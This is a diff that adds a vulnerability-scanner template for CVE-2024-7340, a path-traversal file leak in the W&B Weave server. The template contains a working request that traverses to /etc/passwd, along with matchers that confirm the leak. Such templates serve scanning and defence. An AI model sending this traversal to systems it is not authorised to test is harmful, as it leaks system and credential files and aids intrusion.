Create CVE-2024-7340.yaml

http/cves/2024/CVE-2024-7340.yaml

@@ -0,0 +1,46 @@
+id: CVE-2024-7340
+
+info:
+  name: W&B Weave Server - Remote Arbitrary File Leak
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: high
+  description: |
+    The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.
+  reference:
+    - https://github.com/advisories/GHSA-r49h-6qxq-624f
+    - https://github.com/wandb/weave/pull/1657
+    - https://research.jfrog.com/vulnerabilities/wandb-weave-server-remote-arbitrary-file-leak-jfsa-2024-001039248/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2024-7340
+    epss-score: 0.00043
+    epss-percentile: 0.09404
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2024,lfr,weave,wandb
+
+http:
+  - raw:
+      - |
+        GET /__weave/file/tmp/weave/fs/../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+          - "filename=passwd"
+        condition: and
+
+      - type: status
+        status:
+          - 200